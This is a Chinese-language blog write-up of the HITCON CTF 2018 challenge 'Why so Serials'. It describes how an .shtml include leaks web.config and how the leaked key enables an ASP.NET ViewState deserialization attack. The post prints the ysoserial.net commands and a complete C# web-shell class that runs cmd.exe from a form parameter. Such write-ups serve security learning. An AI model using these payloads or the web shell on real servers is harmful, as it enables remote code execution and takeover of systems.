HITCON CTF 2018 - Why so Serials

最新推荐文章于 2023-11-24 17:22:30 发布
最新推荐文章于 2023-11-24 17:22:30 发布
阅读量517 收藏 1
点赞数
分类专栏: PHP代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42409373/article/details/117780088
版权

打开发现是一道文件上传题,在页面源码中可以发现是aspx写的网站,并在路径/Default.aspx.txt给出了源码,查看源码发现上传黑名单限制:

blacklists = {".aspx", ".config", ".ashx", ".asmx", ".aspq", ".axd", ".cshtm", ".cshtml", ".rem", ".soap", ".vbhtm", ".vbhtml", ".asa", ".asp", ".cer"}

发现没有过滤shtml,在包含命令的文本传给浏览器之前,会对shtml文档进行完全的读取、分析和修改,可以利用shtml中的#include来获取web.config的配置信息。
在这里插入图片描述
通过获取道的配置信息,进行viewstate反序列化攻击,可以使用 ysoserial.net 的 ViewState Plugin 产生合法 MAC 与正确的加密内容,在利用invoke Process.Start 执行cmd命令即可

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\pwn.txt" --generator="CA0B0334" --validationalg="MD5" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87"

但是异常的validationKey通常会导致aspx页面回显500,所以无法得知指令执行的结果。
利用ActivitySurrogateSelectorFromFile的gadget进行,gadget利用Assembly.Load载入.net达成Remote Code Execution,建立无连接的shell后门

ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "C:\Users\zhu\Desktop\ExploitClass.cs;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.dll;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87"

-c 参数放的就不再是系统指令而是想执行的 ExploitClass.cs,dll可以在本机找到

class E{
    public E()
    {
        System.Web.HttpContext context = System.Web.HttpContext.Current;
        context.Server.ClearError();
        context.Response.Clear();
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = "cmd.exe";
            string cmd = context.Request.Form["cmd"];
            process.StartInfo.Arguments = "/c " + cmd;
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.RedirectStandardError = true;
            process.StartInfo.UseShellExecute = false;
            process.Start();
            string output = process.StandardOutput.ReadToEnd();
            context.Response.Write(output);
        } catch (System.Exception) {}
        context.Response.Flush();
        context.Response.End();
    }}

其中 Server.ClearError() 和 Response.End() 都是必要且重要的一步,因为异常的 VIEWSTATE 必然会使得 aspx 页面回应 500 或其他非预期的 Server Error,而第一个函式可以协助清除在当前 Runtime 环境下 stack 中所记录的错误,而 End() 可以让 ASP.NET 将当前上下文标记为请求已处理完成並直接将 Response 回应給客戶端,避免程式继续进入其他 Error Handler 处理导致无法取得指令执行的输出结果。
在这里插入图片描述

xyp1x
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HITCON2022--ctf驱动逆向题
m0_64973256的博客
12-28 998
当用户传入0x222080的时候,驱动进入这个分支,如果数组byte_140013190里的8个值均为1,则会跳转到LABEL_21,很显然,这里验证的内容是dword_140003000的开头是否是hitcon,这说明这里会出现flag。于是经过一番倒腾测试,发现执行一个函数,只有最后一个函数能执行下去,能行,一定是顺序问题,经过又一番测试,得到最终测试顺序,这大概是某种保护手段,阻碍静态分析,真正的函数是运行中动态生成的(实测,异或这两轮的结果并不是可执行的代码)
CTF|HITCON-Training-master lab4 writeup (ret2libc题型)
skyattractive的博客
06-12 380
CTF|HITCON-Training-master lab4 writeup (ret2libc题型) 做题做题前先看看ctfwiki上对ret2libc的原理描述 原理 ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置(即函数对应的 got表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),故而此时我们需要知道 system 函数的地址。 思路 总体思路就是我们遇到没有system没有"/bin/sh"的文件 我们
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理.....................................................................................................................................................................................................................
ev3_basic——HITCON CTF 2018
cnmeimei的博客
09-10 394
[MISC] EN-US This challenge provides a jpg file and a pklg file. The jpg is shown a part of string on LEGO EV3 device. Length of the string, I guess, might be 58. EV3 is supported USB or Bluetooth connection. Bluetooth connection is hinted in the pklg...
2016 HITCON CTF SleepyHolder
Bill
04-22 1721
2016 HITCON CTF SleepyHolder 序言 本来这周准备学习House_Of_Orange, 但是这个牵扯知识点太多. 忽然发现还有一个fastbin_dup_consolidate没有学习, 补一下. 程序运行(文章尾部有程序源码) 1. MENU 1. Keep secret 2. Wipe secret 3. Renew secret 2....
HITCON_CTF_2016_Secret Holder
人饭子的博客
12-31 289
HITCON_CTF_2016:Secret Holder 一、信息收集 RELRO:在Linux系统安全领域数据可以写的存储区就会是攻击的目标,尤其是存储函数指针的区域。 所以在安全防护的角度来说尽量减少可写的存储区域对安全会有极大的好处.GCC, GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术: read only relocatio...
[HITCON CTF 2022] Superprime,rev Meow_way,BabySSS格基约减法,Secret共模攻击模未知
weixin_52640415的博客
12-02 818
RSA p,q相关 3种爆破方式 10进制
windowsland:HITCON CTF 2018
03-19
这是HITCON CTF 2018中挑战“ windowsland”的来源和文章 这个想法是利用Windows用户模式堆中的悬空指针利用安全取消链接 如果有人想直接学习该技术,请参阅unlink_chunk.cpp 脆弱性 bug1:泄漏 复制期间,所有的...
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
BMZCTF hitcon_2017_ssrfme
qq_26243045的博客
11-26 623
考点:perl脚本open命令执行 打开题目显示如下代码 将GET请求到的数据保存在我们自定义的文件名当中。 给url参数传递/可以查看根目录下的内容 Perl的open函数执行会执行给open函数所传递的文件名参数中的系统命令,但是前提是这个文件名是需要存在的。 这道题因为文件名是可以控制的,所以就先生成一个以读取flag命令命名的文件 然后使用file协议去读取文件 访问即可获得flag ...
[HITCON CTF 2022] crypto bypass
weixin_52640415的博客
11-29 686
中国剩余定理 AES MODE_CTF nonce
HITCON_2018_Hackergame_2018_calc(一个容易忽略的计算机整数小知识)
seaaseesa的博客
07-24 457
HITCON_2018_Hackergame_2018_calc 用IDA分析一下,程序注册了异常信号处理函数。 该函数可以执行命令 现在,只要想办法触发异常即可。 程序中过滤了除0异常,其实还可以利用-0x80000000/-1来触发异常。 我们可以做个试验 #include <stdio.h> int main() { int a,b; scanf("%d%d",&a,&b); int c = a/b; pri...
asp.net 中 viewstate 反序列化攻击 学习记录
qq_41891666的博客
07-13 5958
0x00 前言 asp.net 平时接触得少,ctf 中也比较少遇到,之前对他的了解也只限于对 c# 语言的一些简单学习。然后这次在 buu 上面遇到 一道 [BJDCTF 2nd]EasyAspDotNet 题,然后在看wp 的时候,又碰巧了解到 HITCON CTF 2018 - Why so Serials? 和这题差不到,都是利用了viewstate 反序列化来做;然后在查资料的时候,又发现 CVE-2020-0688 exchange远程代码执行漏洞 也是利用viewstate 反序列化漏洞。
无回显条件下的命令执行判断和利用方式研究
m0_59598029的博客
08-16 464
在渗透测试、漏洞挖掘或安全研究的过程中,我们会遇到很多无回显的命令执行点。面对这些无回显的命令执行点,我们很难获取命令执行结果,甚至无法判断命令是否执行成功。本篇文章主要讨论面对这些无回显的命令执行点时的判断和利用方法。首先我们需要知道该点是否存在命令执行漏洞,或者我们的命令是否执行成功了。这里的研判方法有很多种,最常用的是直接通过延时判断,类似我们sql注入里的时间盲注:值得一提的是,windows下并没有sleep命令,那么如何通过时间延时的方式判断windows环境下的命令执行呢?
命令执行漏洞没有回显如何证明
Sgirll的博客
07-19 763
yakit自带dnslog平台,申请域名,执行命令,ping一下域名,
php5.5 反序列化利用工具_如何借助ViewState在ASP.NET中实现反序列化漏洞利用
weixin_39870092的博客
11-24 1103
概述ASP.NET Web应用程序使用ViewState来维护页面状态,并在Web表单中保留数据。ViewState参数是Base64序列化后的餐胡,通常会在POST请求中通过名为“__VIEWSTATE”的隐藏参数发送。在服务器端,将对这个参数进行反序列化,并检索数据。通常可以在Web服务器上运行可以伪造有效ViewState的代码。这一过程可以在禁用MAC验证功能或掌握以下内容的情...
渗透测试-RCE无回显
最新发布
zkaqlaoniao的博客
11-24 76
在我们挖掘src的时候很多都是登录页面,我们知道很多js文件需要你登录后才可以加载出来,但是如果对方是webpack打包的网站,他的js文件命名格式都是像下面这样,其他或者chunk-XXX格式之类的。r = requests.get('https://xxx.xxx.com/static/js/'+line,verify=False)#加载所有js文件。下面就可以写脚本爬取所有js文件,根据接口格式来爬全部接口,接口我们可以bp抓登录接口,然后全局搜索一下来观察它的命名格式。然后写个脚本批量爬一下。
asp.net反序列化的思考和总结
zkaqlaoniao的博客
11-04 396
这篇文章是在Y4er博客和ysoserial.net项目上,总结出的一些关键东西和我自己的思考,希望可以对大家有所帮助。
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值